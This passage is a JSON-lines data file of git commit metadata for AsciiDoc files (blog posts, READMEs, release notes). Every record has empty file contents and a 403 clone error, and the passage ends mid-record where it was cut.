{"commit":"26cc7bf91bd111259fef9366c2293eadc56c2e7f","subject":"added a readme","message":"added a readme\n","repos":"skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skybon\/rigsofrods-website.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"07988871421fd082c3499308a167e0fe50177512","subject":"Fixed project requirements","message":"Fixed project requirements\n\nLinks were updated and version information was dropped in order to\nspecify the bare minimum requirements and reduce situations where the\ndocumentation might not always be up-to-date with the *exact* version\nbeing used.\n","repos":"bkuhlmann\/tokener,bkuhlmann\/tokener,bkuhlmann\/tokener","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/tokener.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc6acc3c41ce89551844cd906d3f2f7886eddc7a","subject":"Updated Readme","message":"Updated Readme\n","repos":"chlewe\/strawpoll,chlewe\/strawpoll","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chlewe\/strawpoll.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51d6f98dccb6064e6b8a8d3dfb34f081dac40c84","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4af0221cc8aac58c7f6b4dcc1a794c1926afbab5","subject":"Update 2016-06-17-Gradle-30-M2-brings-Java-9-support.adoc","message":"Update 2016-06-17-Gradle-30-M2-brings-Java-9-support.adoc","repos":"melix\/hubpress,melix\/hubpress,melix\/hubpress,melix\/hubpress","old_file":"_posts\/2016-06-17-Gradle-30-M2-brings-Java-9-support.adoc","new_file":"_posts\/2016-06-17-Gradle-30-M2-brings-Java-9-support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/melix\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a33ed3df443061ab9f2aa6fb659d8d577154f1b","subject":"Publish 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","message":"Publish 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_file":"04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa94952b684eb9dcb4e92d1c3e013c0f2f8e9885","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cd68284fd5c3f4139914b556c1387da76ce38a5","subject":"Add reference to ff4j starter","message":"Add reference to ff4j starter\n","repos":"xiaoleiPENG\/my-project,mbogoevici\/spring-boot,habuma\/spring-boot,mosoft521\/spring-boot,kdvolder\/spring-boot,minmay\/spring-boot,spring-projects\/spring-boot,afroje-reshma\/spring-boot-sample,wilkinsona\/spring-boot,sebastiankirsch\/spring-boot,kamilszymanski\/spring-boot,hello2009chen\/spring-boot,rweisleder\/spring-boot,shakuzen\/spring-boot,jbovet\/spring-boot,akmaharshi\/jenkins,donhuvy\/spring-boot,linead\/spring-boot,herau\/spring-boot,lexandro\/spring-boot,vpavic\/spring-boot,sebastiankirsch\/spring-boot,bclozel\/spring-boot,chrylis\/spring-boot,deki\/spring-boot,lburgazzoli\/spring-boot,Buzzardo\/spring-boot,ilayaperumalg\/spring-boot,bijukunjummen\/spring-boot,qerub\/spring-boot,SaravananParthasarathy\/SPSDemo,zhanhb\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,SaravananParthasarathy\/SPSDemo,ollie314\/spring-boot,eddumelendez\/spring-boot,drumonii\/spring-boot,ihoneymon\/spring-boot,sebastiankirsch\/spring-boot,tsachev\/spring-boot,mbenson\/spring-boot,isopov\/spring-boot,zhanhb\/spring-boot,kdvolder\/spring-boot,scottfrederick\/spring-boot,candrews\/spring-boot,nebhale\/spring-boot,lucassaldanha\/spring-boot,lexandro\/spring-boot,rweisleder\/spring-boot,eddumelendez\/spring-boot,donhuvy\/spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot-concourse,vakninr\/spring-boot,wilkinsona\/spring-boot,isopov\/spring-boot,olivergierke\/spring-boot,xiaoleiPENG\/my-project,bbrouwer\/spring-boot,mdeinum\/spring-boot,olivergierke\/spring-boot,bclozel\/spring-boot,dreis2211\/spring-boot,yhj630520\/spring-boot,NetoDevel\/spring-boot,NetoDevel\/spring-boot,pvorb\/spring-boot,zhanhb\/spring-boot,vpavic\/spring-boot,javyzheng\/spring-boot,akmaharshi\/jenkins,SaravananParthasarathy\/SPSDemo,shangyi0102\/spring-boot,RichardCSantana\/spring-boot,htynkn\/spring-boot,kamilszymanski\/spring-boot,shakuzen\/spring-boot,donhuvy\/spring-boot,jxblum\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,rweisleder\/spring-boot,olivergierke\/spring-boot,SaravananParthasarathy\/SPSDemo,mbogoevici\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,philwebb\/spring-boot,aahlenst\/spring-boot,minmay\/spring-boot,lburgazzoli\/spring-boot,afroje-reshma\/spring-boot-sample,bclozel\/spring-boot,zhanhb\/spring-boot,mbogoevici\/spring-boot,DeezCashews\/spring-boot,thomasdarimont\/spring-boot,bjornlindstrom\/spring-boot,lucassaldanha\/spring-boot,cleverjava\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,spring-projects\/spring-boot,yhj630520\/spring-boot,joshthornhill\/spring-boot,bijukunjummen\/spring-boot,jxblum\/spring-boot,lucassaldanha\/spring-boot,ilayaperumalg\/spring-boot,jvz\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,shangyi0102\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,felipeg48\/spring-boot,ollie314\/spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,tsachev\/spring-boot,philwebb\/spring-boot,mdeinum\/spring-boot,vpavic\/spring-boot,ihoneymon\/spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,NetoDevel\/spring-boot,thomasdarimont\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,lburgazzoli\/spring-boot,royclarkson\/spring-boot,mdeinum\/spring-boot,drumonii\/spring-boot,xiaoleiPENG\/my-project,jbovet\/spring-boot,michael-simons\/spring-boot,linead\/spring-boot,kdvolder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bjornlindstrom\/spring-boot,tsachev\/spring-boot,Nowheresly\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,hqrt\/jenkins2-course-spring-boot,htynkn\/spring-boot,ptahchiev\/spring-boot,eddumelendez\/spring-boot,shakuzen\/spring-boot,shangyi0102\/spring-boot,sbcoba\/spring-boot,nebhale\/spring-boot,jayarampradhan\/spring-boot,lucassaldanha\/spring-boot,i007422\/jenkins2-course-spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,yhj630520\/spring-boot,spring-projects\/spring-boot,kamilszymanski\/spring-boot,hello2009chen\/spring-boot,RichardCSantana\/spring-boot,ilayaperumalg\/spring-boot,royclarkson\/spring-boot,i007422\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,vpavic\/spring-boot,candrews\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,rweisleder\/spring-boot,Buzzardo\/spring-boot,ollie314\/spring-boot,mbogoevici\/spring-boot,donhuvy\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,chrylis\/spring-boot,mdeinum\/spring-boot,bbrouwer\/spring-boot,qerub\/spring-boot,pvorb\/spring-boot,ptahchiev\/spring-boot,ptahchiev\/spring-boot,kamilszymanski\/spring-boot,DeezCashews\/spring-boot,afroje-reshma\/spring-boot-sample,aahlenst\/spring-boot,tiarebalbi\/spring-boot,sbcoba\/spring-boot,vakninr\/spring-boot,jbovet\/spring-boot,ilayaperumalg\/spring-boot,bjornlindstrom\/spring-boot,joshiste\/spring-boot,bbrouwer\/spring-boot,spring-projects\/spring-boot,joshthornhill\/spring-boot,olivergierke\/spring-boot,tsachev\/spring-boot,qerub\/spring-boot,thomasdarimont\/spring-boot,philwebb\/spring-boot,akmaharshi\/jenkins,dreis2211\/spring-boot,philwebb\/spring-boot-concourse,tiarebalbi\/spring-boot,donhuvy\/spring-boot,brettwooldridge\/spring-boot,herau\/spring-boot,dreis2211\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,candrews\/spring-boot,joshthornhill\/spring-boot,spring-projects\/spring-boot,philwebb\/spring-boot-concourse,mbenson\/spring-boot,cleverjava\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,dreis2211\/spring-boot,ihoneymon\/spring-boot,scottfrederick\/spring-boot,habuma\/spring-boot,RichardCSantana\/spring-boot,felipeg48\/spring-boot,akmaharshi\/jenkins,habuma\/spring-boot,bijukunjummen\/spring-boot,joshiste\/spring-boot,mosoft521\/spring-boot,yangdd1205\/spring-boot,dreis2211\/spring-boot,sbcoba\/spring-boot,yangdd1205\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot,brettwooldridge\/spring-boot,brettwooldridge\/spring-boot,bclozel\/spring-boot,javyzheng\/spring-boot,scottfrederick\/spring-boot,bjornlindstrom\/spring-boot,htynkn\/spring-boot,kamilszymanski\/spring-boot,philwebb\/spring-boot,ptahchiev\/spring-boot,joshiste\/spring-boot,ihoneymon\/spring-boot,mosoft521\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,aahlenst\/spring-boot,i007422\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,michael-simons\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,tiarebalbi\/spring-boot,brettwooldridge\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,spring-projects\/spring-boot,aahlenst\/spring-boot,philwebb\/spring-boot-concourse,xiaoleiPENG\/my-project,felipeg48\/spring-boot,qerub\/spring-boot,hqrt\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,ilayaperumalg\/spring-boot,mbenson\/spring-boot,philwebb\/spring-boot-concourse,jvz\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,jxblum\/spring-boot,sebastiankirsch\/spring-boot,sbcoba\/spring-boot,bbrouwer\/spring-boot,tiarebalbi\/spring-boot,deki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,deki\/spring-boot,i007422\/jenkins2-course-spring-boot,habuma\/spring-boot,zhanhb\/spring-boot,Nowheresly\/spring-boot,shakuzen\/spring-boot,DeezCashews\/spring-boot,drumonii\/spring-boot,NetoDevel\/spring-boot,joshthornhill\/spring-boot,afroje-reshma\/spring-boot-sample,wilkinsona\/spring-boot,kdvolder\/spring-boot,joshthornhill\/spring-boot,SaravananParthasarathy\/SPSDemo,mdeinum\/spring-boot,yhj630520\/spring-boot,eddumelendez\/spring-boot,habuma\/spring-boot,jayarampradhan\/spring-boot,bbrouwer\/spring-boot,eddumelendez\/spring-boot,javyzheng\/spring-boot,NetoDevel\/spring-boot,donhuvy\/spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,bclozel\/spring-boot,ihoneymon\/spring-boot,joshiste\/spring-boot,vakninr\/spring-boot,lucassaldanha\/spring-boot,tsachev\/spring-boot,javyzheng\/spring-boot,jvz\/spring-boot,candrews\/spring-boot,drumonii\/spring-boot,nebhale\/spring-boot,htynkn\/spring-boot,isopov\/spring-boot,afroje-reshma\/spring-boot-sample,wilkinsona\/spring-boot,pvorb\/spring-boot,javyzheng\/spring-boot,candrews\/spring-boot,hqrt\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,sebastiankirsch\/spring-boot,royclarkson\/spring-boot,scottfrederick\/spring-boot,jayarampradhan\/spring-boot,isopov\/spring-boot,Buzzardo\/spring-boot,akmaharshi\/jenkins,linead\/spring-boot,jxblum\/spring-boot,tiarebalbi\/spring-boot,ptahchiev\/spring-boot,jbovet\/spring-boot,brettwooldridge\/spring-boot,Nowheresly\/spring-boot,scottfrederick\/spring-boot,linead\/spring-boot,linead\/spring-boot,lexandro\/spring-boot,michael-simons\/spring-boot,drumonii\/spring-boot,shangyi0102\/spring-boot,ollie314\/spring-boot,shakuzen\/spring-boot,shangyi0102\/spring-boot,chrylis\/spring-boot,hello2009chen\/spring-boot,minmay\/spring-boot,kdvolder\/spring-boot,bijukunjummen\/spring-boot,isopov\/spring-boot,lexandro\/spring-boot,jvz\/spring-boot,felipeg48\/spring-boot,deki\/spring-boot,philwebb\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-boot,nebhale\/spring-boot,Buzzardo\/spring-boot,lburgazzoli\/spring-boot,lexandro\/spring-boot,chrylis\/spring-boot,DeezCashews\/spring-boot,jbovet\/spring-boot,minmay\/spring-boot,joshiste\/spring-boot,shakuzen\/spring-boot,ollie314\/spring-boot,mbenson\/spring-boot,thomasdarimont\/spring-boot,jxblum\/spring-boot,yangdd1205\/spring-boot,Buzzardo\/spring-boot,qerub\/spring-boot,DeezCashews\/spring-boot,lburgazzoli\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,mosoft521\/spring-boot,i007422\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,mbenson\/spring-boot,herau\/spring-boot,michael-simons\/spring-boot,herau\/spring-boot,sbcoba\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,herau\/spring-boot,jvz\/spring-boot,aahlenst\/spring-boot,bclozel\/spring-boot,nebhale\/spring-boot,yhj630520\/spring-boot,deki\/spring-boot,minmay\/spring-boot,hello2009chen\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mosoft521\/spring-boot,felipeg48\/spring-boot,olivergierke\/spring-boot,bijukunjummen\/spring-boot,mbogoevici\/spring-boot,RichardCSantana\/spring-boot,rweisleder\/spring-boot,bjornlindstrom\/spring-boot,ptahchiev\/spring-boot,zhanhb\/spring-boot,aahlenst\/spring-boot,joshiste\/spring-boot,jayarampradhan\/spring-boot,thomasdarimont\/spring-boot,RichardCSantana\/spring-boot","old_file":"spring-boot-starters\/README.adoc","new_file":"spring-boot-starters\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c9eff6c8be1b20a14c1ec64f4cd9bb0a4f1efae","subject":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","message":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b99c97c7d0865fdd04854415c6b020419bfdb9d","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e014d2b1fa98dd411aa6ae884dc5517a492b98c2","subject":"Modifica di qualche ritorno a capo","message":"Modifica di qualche ritorno a capo\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"4dd9480ab7720b996b3a50ab332ad80cd77ecadb","subject":"Removing trailing whitespaces","message":"Removing trailing whitespaces","repos":"joachimmetz\/artifacts,Onager\/artifacts,Onager\/artifacts,pstirparo\/artifacts,joachimmetz\/artifacts,ForensicArtifacts\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"671704bf037be6fb1a81ed03e0a16283b925ef36","subject":"Add release notes document for release 2.23.0","message":"Add release notes document for release 2.23.0\n\nSigned-off-by: Gregor Zurowski <5fdc67d2166bcdd1d3aa4ed45ea5a25e9b21bc20@zurowski.org>\n","repos":"apache\/camel,gnodet\/camel,ullgren\/camel,punkhorn\/camel-upstream,mcollovati\/camel,mcollovati\/camel,nicolaferraro\/camel,mcollovati\/camel,alvinkwekel\/camel,pmoerenhout\/camel,zregvart\/camel,punkhorn\/camel-upstream,christophd\/camel,apache\/camel,tdiesler\/camel,tadayosi\/camel,DariusX\/camel,adessaigne\/camel,DariusX\/camel,apache\/camel,CodeSmell\/camel,christophd\/camel,davidkarlsen\/camel,apache\/camel,davidkarlsen\/camel,Fabryprog\/camel,objectiser\/camel,apache\/camel,adessaigne\/camel,tdiesler\/camel,tdiesler\/camel,cunningt\/camel,tadayosi\/camel,nikhilvibhav\/camel,christophd\/camel,nikhilvibhav\/camel,gnodet\/camel,cunningt\/camel,nikhilvibhav\/camel,Fabryprog\/camel,tdiesler\/camel,CodeSmell\/camel,nicolaferraro\/camel,adessaigne\/camel,tadayosi\/camel,CodeSmell\/camel,tadayosi\/camel,objectiser\/camel,nicolaferraro\/camel,objectiser\/camel,CodeSmell\/camel,pax95\/camel,davidkarlsen\/camel,pax95\/camel,alvinkwekel\/camel,christophd\/camel,cunningt\/camel,pmoerenhout\/camel,tdiesler\/camel,punkhorn\/camel-upstream,pax95\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,adessaigne\/camel,gnodet\/camel,adessaigne\/camel,Fabryprog\/camel,Fabryprog\/camel,cunningt\/camel,pax95\/camel,cunningt\/camel,ullgren\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,christophd\/camel,gnodet\/camel,zregvart\/camel,pmoerenhout\/camel,nicolaferraro\/camel,zregvart\/camel,pmoerenhout\/camel,DariusX\/camel,zregvart\/camel,cunningt\/camel,tdiesler\/camel,alvinkwekel\/camel,adessaigne\/camel,gnodet\/camel,ullgren\/camel,objectiser\/camel,davidkarlsen\/camel,christophd\/camel,pax95\/camel,pax95\/camel,DariusX\/camel,ullgren\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,mcollovati\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2230-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2230-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2d3a801ca7fba911ec3b2b2611a9533d8224875","subject":"Update 2018-10-16-an-existential-wonder.adoc","message":"Update 2018-10-16-an-existential-wonder.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2018-10-16-an-existential-wonder.adoc","new_file":"_posts\/2018-10-16-an-existential-wonder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1254f7725b3dfe5c7bc05dad7e84e559c775e313","subject":"Update 2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","message":"Update 2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","new_file":"_posts\/2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55f19ac49ffe918b0d7982ef1563ab467e831a81","subject":"Update 2016-04-10-My-first-post-on-githubio-with-hubpressio.adoc","message":"Update 2016-04-10-My-first-post-on-githubio-with-hubpressio.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2016-04-10-My-first-post-on-githubio-with-hubpressio.adoc","new_file":"_posts\/2016-04-10-My-first-post-on-githubio-with-hubpressio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ade194f1feedd9fbcd3d46f0ed736f2ed66c0037","subject":"Update 2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","message":"Update 2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","new_file":"_posts\/2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e59c4cd9099a9e2a746f8df8256d149762804033","subject":"y2b create post Marshall Minor Headphones Unboxing (White)","message":"y2b create post Marshall Minor Headphones Unboxing (White)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-06-Marshall-Minor-Headphones-Unboxing-White.adoc","new_file":"_posts\/2012-01-06-Marshall-Minor-Headphones-Unboxing-White.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be2e1181070d6b5586e0bcac06285383fdb9c45a","subject":"Update 2017-02-01-Visualisation-of-January-Transfer-Window.adoc","message":"Update 2017-02-01-Visualisation-of-January-Transfer-Window.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-02-01-Visualisation-of-January-Transfer-Window.adoc","new_file":"_posts\/2017-02-01-Visualisation-of-January-Transfer-Window.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dc11f6129ab04ddb98b99fcff70bdc5c229cd17","subject":"UnitTests-082320","message":"UnitTests-082320\n\nAdd note","repos":"keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint","old_file":"doc-bridgepoint\/notes\/UnitTests-082320\/UnitTests-082320_int.adoc","new_file":"doc-bridgepoint\/notes\/UnitTests-082320\/UnitTests-082320_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ee1f5a7778bcfb81f62a26822f1bf5e5a397aac","subject":"y2b create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","message":"y2b create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-19-OnePlus5TLavaRedUnboxing500CantGoFurther.adoc","new_file":"_posts\/2018-01-19-OnePlus5TLavaRedUnboxing500CantGoFurther.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aca2002814ce7a44c1c275b59241d65c0527775c","subject":"y2b create post Sekonic L-758DR DigitalMaster Unboxing \\u0026 Overview + Close Ups!","message":"y2b create post Sekonic L-758DR DigitalMaster Unboxing \\u0026 Overview + Close Ups!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-20-Sekonic-L758DR-DigitalMaster-Unboxing-u0026-Overview--Close-Ups.adoc","new_file":"_posts\/2011-01-20-Sekonic-L758DR-DigitalMaster-Unboxing-u0026-Overview--Close-Ups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cca14dfcabbd01835f741557eb27ff28dba9dcdd","subject":"Delete the file at '_posts\/2017-05-31-A-test.adoc'","message":"Delete the file at '_posts\/2017-05-31-A-test.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-A-test.adoc","new_file":"_posts\/2017-05-31-A-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 